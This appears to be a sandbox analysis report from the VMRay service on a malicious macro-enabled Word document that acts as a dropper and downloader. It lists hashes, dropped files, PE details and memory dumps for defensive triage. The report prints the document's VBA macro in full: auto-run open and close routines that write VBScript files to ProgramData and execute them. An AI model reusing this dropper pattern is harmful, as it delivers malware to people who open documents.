b2946daf...3c4d | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Dropper
Downloader
Threat Names:
Trojan.GenericKDZ.69442
Trojan.GenericKDZ.69475
Trojan.Agent.EVAV
...

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "30 seconds" to "10 seconds" to reveal dormant functionality.

Filename Category Type Severity
C:\Users\FD1HVy\Desktop\payload_1.doc Sample File Word Document Malicious
Mime Type application/vnd.ms-word.document.macroEnabled.12
File Size 381.40 KB
MD5 f05fe39e81df5368c442a13202b4ab53
SHA1 0087d1d0cdde6268a425ef6d546a77e3a120c0f5
SHA256 b2946daf21b5a0d9c70f32230f6e511ff4aeb939fc8f9a5d372a67f932483c4d
SSDeep 6144:cfm2kjkjxuWiyKMUsTn8XBlKqqUY1BaE8D7h6JDAm30QWIOtfXuu4MCUlmoykTHt:cfm2hVuW7VgmUYSDevEbIOE7gFywyq+K
ImpHash -
Office Information
Creator Пользователь Windows
Last Modified By Пользователь Windows
Revision 138
Create Time 2020-08-11 10:03:00+00:00
Modify Time 2020-08-14 13:12:00+00:00
Document Information
Application Microsoft Office Word
App Version 14.0000
Template Normal.dotm
Company SPecialiST RePack
Document Security NONE
Editing Time 4286.0
Page Count 1
Line Count 6
Paragraph Count 1
Word Count 130
Character Count 742
Chars With Spaces 871
Base Target ['C:\\ProgramData\\JHJKGHuggUGUGYYuyggg.vbs']
ScaleCrop False
SharedDoc False
VBA Macros (1)
Macro #1: Brofaset
Attribute VB_Name = "Brofaset"
Private HYyetwertuFGHFTrt5ertRFGXFD
Sub autoopen()

Open "C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty" & JDSUAGDFYYUGED.Tag For Binary As #1

Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "

Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "


Close #1

Application.Quit SaveChanges:=False

End Sub
Sub autoclose()


Open "C:\ProgramData\JHJKGHuggUGUGYYuyggg" & JDSUAGDFYYUGED.Tag For Binary As #1



Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "

Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "


Put #1, , JDSUAGDFYYUGED.GHJHGFGHKFTKDFTYFTFYDDYDFLRYTYDDYDFYKLDKTY.Caption

Close #1

Set HYyetwertuFGHFTrt5ertRFGXFD = CreateObject(JDSUAGDFYYUGED.Caption)
HYyetwertuFGHFTrt5ertRFGXFD.Exec "explorer.exe " & Hopertiol.DefaultTargetFrame

End Sub


Local AV Matches (1)
Threat Name Severity
Trojan.GenericKDZ.69442 Malicious
C:\Users\FD1HVy\AppData\Roaming\Microsoft\Qieeyrekuc\xafpqko.exe Downloaded File Binary Malicious
Also Known As C:\BlotRots\Loterios.exe (Downloaded File); 111111.png (Embedded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 841.93 KB
MD5 58b7e077fdcaae67670713374fe6e869
SHA1 2cf12d3b8f62528bc1d02d2fe3b0e5a877676576
SHA256 37790b6946072ccacb7cf9be694b962deee2c53818449eba20f450389d0cfa4a
SSDeep 6144:VMhkpTK06/aA6udzpNi1yna2PiQ0erLeROSEGo89QNn/o8S2M1KpWwR+SHvRu4Tr:VMEK06CmNi1L54Z89QNNpJgC5j
ImpHash -
Local AV Matches (1)
Threat Name Severity
Trojan.GenericKDZ.69475 Malicious
C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs Dropped File Text Blacklisted
Mime Type text/x-vbscript
File Size 68.40 KB
MD5 ad7b09adba59218ce485148faf21dc82
SHA1 0a3851f903f7d928688e5ebeee13f6d5d921b4de
SHA256 214fd312196dd5769f94ed778c50df1eaf49a5c8287c67edcf2fbd05dff02cb2
SSDeep 1536:TC70ITO1lsleRKby43mmImmmmm/V1GRpCcPh45V7yJVx4wFc4PMo5Y1ns3wt:T5yO1lQ33mmImmmmmd14CTt1ns3wt
ImpHash -
File Reputation Information
Severity Blacklisted
Names Mal/Generic-S
vbaProject.bin Embedded File OLE Compound Blacklisted
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type application/CDFV2
File Size 162.00 KB
MD5 cf8c43d0b64478708ccfa80aa8e87bc8
SHA1 aad4fb86e5cc03ded0aeba3e334569e95706b0a7
SHA256 a09c4e6ff2ee16e7b6cd1865e33147711f0f894ce99000937444da61dd36d50e
SSDeep 1536:37WNeMBHx1GGd+CKtfSo4+oYFNaeI2bsuhNe4VTdRnTT8w4TWnqp:eeA3GGRwfkYFdhNe4VTdRnTT8w4TWnq
ImpHash -
File Reputation Information
Severity Blacklisted
Names Mal/Generic-S
c:\users\fd1hvy\appdata\local\temp\~df4ab52671a349b2ff.tmp Dropped File Stream Whitelisted
Mime Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
SSDeep 3::
ImpHash -
File Reputation Information
Severity Whitelisted
c:\users\fd1hvy\appdata\local\temp\~dff1121ef9e20057e3.tmp Dropped File OLE Compound Whitelisted
Mime Type application/CDFV2
File Size 1.50 KB
MD5 72f5c05b7ea8dd6059bf59f50b22df33
SHA1 d5af52e129e15e3a34772806f6c5fbf132e7408e
SHA256 1dc0c8d7304c177ad0e74d3d2f1002eb773f4b180685a7df6bbe75ccc24b0164
SSDeep 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
ImpHash -
File Reputation Information
Severity Whitelisted
C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbvqg2du.z4l.ps1 Dropped File Text Whitelisted
Also Known As C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_hby2evjc.ztp.psm1 (Dropped File)
Mime Type text/x-powershell
File Size 1 Bytes
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SSDeep 3:U:U
ImpHash -
File Reputation Information
Severity Whitelisted
C:\BlotRots\Loterios.exe Dropped File Binary Whitelisted
Mime Type application/vnd.microsoft.portable-executable
File Size 25.50 KB
MD5 159ab34f06af279ef3f57c2ceadb9768
SHA1 dcabf4bba851e92d45e5a60390bb4eb2b1ef5fd4
SHA256 c0f9cc1663b74a106c5c3356988ffa42d64f9c941ef9cb46aabf16ce8a213baf
SSDeep 384:qP3sr4k8HXLiZi20WSIYWfiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiLiiiiir9:fYig29i Copy to Clipboard
ImpHash 888263dd2e0b3db374c7948581a974ed
File Reputation Information
Severity Whitelisted
PE Information
Image Base 0x400000
Entry Point 0x401b80
Size Of Code 0x1000
Size Of Initialized Data 0x5400
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2066-10-03 12:52:05+00:00
Version Information (8)
CompanyName Microsoft Corporation
FileDescription Windows Calculator
FileVersion 10.0.15063.0 (WinBuild.160101.0800)
InternalName CALC
LegalCopyright © Microsoft Corporation. All rights reserved.
OriginalFilename CALC.EXE
ProductName Microsoft® Windows® Operating System
ProductVersion 10.0.15063.0
Sections (5)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0xf6c 0x1000 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 5.73
.data 0x402000 0x3a4 0x200 0x1400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.3
.idata 0x403000 0x4a8 0x600 0x1600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.05
.rsrc 0x404000 0x4708 0x4800 0x1c00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 2.81
.reloc 0x409000 0x170 0x200 0x6400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 5.0
Imports (7)
SHELL32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ShellExecuteW 0x0 0x403038 0x3174 0x1774 0x1b8
KERNEL32.dll (9)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetUnhandledExceptionFilter 0x0 0x403010 0x314c 0x174c 0x55e
GetCurrentProcess 0x0 0x403014 0x3150 0x1750 0x213
TerminateProcess 0x0 0x403018 0x3154 0x1754 0x57c
UnhandledExceptionFilter 0x0 0x40301c 0x3158 0x1758 0x59d
GetCurrentProcessId 0x0 0x403020 0x315c 0x175c 0x214
GetCurrentThreadId 0x0 0x403024 0x3160 0x1760 0x218
GetSystemTimeAsFileTime 0x0 0x403028 0x3164 0x1764 0x2e2
GetTickCount 0x0 0x40302c 0x3168 0x1768 0x300
QueryPerformanceCounter 0x0 0x403030 0x316c 0x176c 0x440
msvcrt.dll (15)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
_amsg_exit 0x0 0x403058 0x3194 0x1794 0x111
__p__fmode 0x0 0x40305c 0x3198 0x1798 0xce
__setusermatherr 0x0 0x403060 0x319c 0x179c 0xe4
_initterm 0x0 0x403064 0x31a0 0x17a0 0x1e8
_wcmdln 0x0 0x403068 0x31a4 0x17a4 0x405
?terminate@@YAXXZ 0x0 0x40306c 0x31a8 0x17a8 0x35
_controlfp 0x0 0x403070 0x31ac 0x17ac 0x137
_except_handler4_common 0x0 0x403074 0x31b0 0x17b0 0x16a
_exit 0x0 0x403078 0x31b4 0x17b4 0x173
__p__commode 0x0 0x40307c 0x31b8 0x17b8 0xc9
_XcptFilter 0x0 0x403080 0x31bc 0x17bc 0x6f
exit 0x0 0x403084 0x31c0 0x17c0 0x4ae
__set_app_type 0x0 0x403088 0x31c4 0x17c4 0xe2
__wgetmainargs 0x0 0x40308c 0x31c8 0x17c8 0xf1
_cexit 0x0 0x403090 0x31cc 0x17cc 0x124
ADVAPI32.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
EventRegister 0x0 0x403000 0x313c 0x173c 0x120
EventSetInformation 0x0 0x403004 0x3140 0x1740 0x121
EventWriteTransfer 0x0 0x403008 0x3144 0x1744 0x128
api-ms-win-core-synch-l1-2-0.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
Sleep 0x0 0x403050 0x318c 0x178c 0x2d
api-ms-win-core-processthreads-l1-1-2.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetStartupInfoW 0x0 0x403048 0x3184 0x1784 0x20
api-ms-win-core-libraryloader-l1-2-0.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetModuleHandleA 0x0 0x403040 0x317c 0x177c 0x11
Memory Dumps (15)
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA
loterios.exe 19 0x00400000 0x004D2FFF Relevant Image True 32-bit 0x00401A5B True False
buffer 19 0x020A0000 0x0216EFFF First Execution True 32-bit 0x020AB330 True False
buffer 19 0x020A0000 0x0216EFFF Content Changed True 32-bit 0x020AD731 True False
buffer 19 0x020A0000 0x0216EFFF Content Changed True 32-bit 0x020A749C True False
buffer 19 0x020A0000 0x0216EFFF Content Changed True 32-bit 0x020A1FEB True False
loterios.exe 21 0x00400000 0x004D2FFF Relevant Image True 32-bit 0x00401A5B True False
buffer 21 0x02070000 0x0213EFFF First Execution True 32-bit 0x0207B330 True False
buffer 21 0x02070000 0x0213EFFF Content Changed True 32-bit 0x0207D731 True False
buffer 21 0x02070000 0x0213EFFF Content Changed True 32-bit 0x0207749C True False
buffer 21 0x02070000 0x0213EFFF Content Changed True 32-bit 0x02071FEB True False
loterios.exe 21 0x00400000 0x004D2FFF Process Termination True 32-bit - True False
xafpqko.exe 22 0x00400000 0x004D2FFF Relevant Image True 32-bit 0x00401A5B True False
loterios.exe 19 0x00400000 0x004D2FFF Process Termination True 32-bit - True False
xafpqko.exe 26 0x00400000 0x004D2FFF Relevant Image True 32-bit 0x00401A5B True False
buffer 26 0x02070000 0x0213EFFF First Execution True 32-bit 0x0207B330 True False
C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Modified File Stream Unknown
Mime Type application/octet-stream
File Size 47.45 KB
MD5 ee5c425bd4738521f177f2a418bb1745
SHA1 dbfa3fa1dd387290394fdfa19e163a2ef774567a
SHA256 1675997a7f2dbab63b955889ece8d81e0331e25a0b551f8fd563e04b1bc3cb9e
SSDeep 768:jUpAa5BHMrxbfrRJPFh48Fq3ThRW/Y+e+jH0qlwKH/mYohV3IpNBQkj2As454Z6D:jUpAa5RMrxbflJdh4thRW/3e+jH0qWKh
ImpHash -
C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty.vbs Dropped File Text Unknown
Mime Type text/x-vbscript
File Size 2.37 KB
MD5 f07e30c22ead3c49606617eb04fbf9c7
SHA1 539dbd8cda2c1e6ada7a02e146c33b5aae7b1099
SHA256 4639cb4ccdef149ef325770ccf4fff658b7cb528d71661113dbfe9e1c683dbf9
SSDeep 24:v1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1p1:t Copy to Clipboard
ImpHash -
C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd Dropped File Batch Unknown
Mime Type application/x-bat
File Size 5.93 KB
MD5 2d63e5c7ff61a560f0cc7dccd0661bf6
SHA1 995efc69bd84b193786de1a993ad7052f14e9542
SHA256 94a12075382cb44133ba8dd51973b583d4c2514f7d3d7414ae4d9a92b5354584
SSDeep 96:YSGSuSQSoSGScCSuSQSoSGScCSuSQSoSGScZNXt2fy8OtSuSQSoSGScCSuSQSoSc:SYfmm
ImpHash -
C:\Users\FD1HVy\AppData\Roaming\Microsoft\Qieeyrekuc\xafpqko.dat Dropped File Stream Unknown
Mime Type application/octet-stream
File Size 63 Bytes
MD5 2cf2ace32a9a9c6aebed3975a41b1a27
SHA1 d8a1df54794ee12b36051e1a6ae087c0dece6179
SHA256 eed8ec8e5b9e3133ceff1f87e6b4174e99a8029c5d4ab1c6a3953d1a8807cd32
SSDeep 3:ywhtsGz4/26kbhKjq8+LP35pPsn:yUtsG8Ebh98+L356
ImpHash -
C:\Users\FD1HVy\AppData\Roaming\Microsoft\Qieeyrekuc\xafpqko.dat Dropped File Stream Unknown
Mime Type application/octet-stream
File Size 80 Bytes
MD5 2c863d3b50ac48b86a109f24d84179c6
SHA1 f64fe619cd5de1979287e6f6bf2bc354fbc0b666
SHA256 9df5fc5f7b4db8881976cc92e377e5d51bcfb74c76b92a965c9e343d47b9cf50
SSDeep 3:GnvLPCJCQicY2VlvE88MhA55lf0l9PZn:Gv7KCQicY2d8MhA1ynn
ImpHash -
C:\Users\FD1HVy\AppData\Roaming\Microsoft\Qieeyrekuc\xafpqko.dat Dropped File Stream Unknown
Mime Type application/octet-stream
File Size 172 Bytes
MD5 c658fbd34b9297e83d153ef2acc802bf
SHA1 1627bbc3a3fe41794f59f31699e09c5704c7b3c8
SHA256 b0d2bf6da08350e1bd794d94f09567798e77491658b4a12f1d4baf9e9f228047
SSDeep 3:wLqwG20JY2VlvE88MhA55lf0l9PZltsrpUHyWhxxLegOUR95HFp8Y79tvLn:wLqwhIY2d8MhA1ynQrmyRgnEY7HL
ImpHash -
document.xml Embedded File Text Unknown
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type text/xml
File Size 122.35 KB
MD5 b6608e351be97da6ac46b15cdb208f13
SHA1 98030b0d51b8fb18acbc17eee76ea43c4ad16251
SHA256 2689c777d804cc65a09bee259cbc39256390c3ad6e9f1794d794e3b1d361d662
SSDeep 1536:UYRGs41wV1NPAYkD2JDVhGI2JDVPPAYkD2JDVCAYkD2JDVhGaa:CD
ImpHash -
footnotes.xml Embedded File Text Unknown
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type text/xml
File Size 1.57 KB
MD5 2282ed85cfc02646ca526f0a14924316
SHA1 99c1ec3815701a65d2f496296e2bb542e102709c
SHA256 3c821e90238f6699f44ae71ec451d8ddd6663f60747dbb01dc376e2a118f4086
SSDeep 48:c4v+Bc6mNYYNEbz+qliS+Q+H+Uv+L+p4zRQ1ITRQh:9sc6mmY+bzZliSfiZoRK1bh
ImpHash -
settings.xml Embedded File Text Unknown
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type text/xml
File Size 5.92 KB
MD5 ac75e026443cd05ae30409eec12d9e10
SHA1 a3dc71d64153da89fc83998fc33c16574dbdc194
SHA256 8558d5db67061bd559d38e9532fce71240db0f9fe962e6521c2231917b680c1c
SSDeep 96:+c6mmY+bliStHhm93QxN9xbufLlxzuZRRaKTrIYtisqt99Q4SQga9S:+xmmY+gsHQ9ortisqt99Q4SQga9S
ImpHash -
endnotes.xml Embedded File Text Unknown
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type text/xml
File Size 1.57 KB
MD5 5da516c9bd0e29ec357c52fcf4a5f5c2
SHA1 5ead4ecd9b7329c8a80d668be2e1219dd5f4f185
SHA256 9294de934df9fa2b8aa261e9abf071b5ef2c023e368125a6f23b4a8fdfd598be
SSDeep 48:cpv+Bc6mNYYNEbz+qliS+Q+H+Uv+L+pNRQmTRQl:Usc6mmY+bzZliSfiZoBhl
ImpHash -
image1.png Embedded File Image Unknown
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type image/png
File Size 326.69 KB
MD5 a867b95c7f735b6ac1f235e4dec72485
SHA1 854a1a8f5178f6e696bb245007b9903906b4af14
SHA256 fa285309506d70241db1db739c39e428c3eb88dc1229a80bcf15c36f5f71e6c2
SSDeep 6144:axuWiyKMUsTn8XBlKqqUY1BaE8D7h6JDAm30QWIOtfXuu4MCUlmoykTHSqSrg:muW7VgmUYSDevEbIOE7gFywyqv
ImpHash -
c:\users\fd1hvy\appdata\roaming\microsoft\forms\winword.box Dropped File Unknown Not Queried
Mime Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash -
Function Logfile

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.
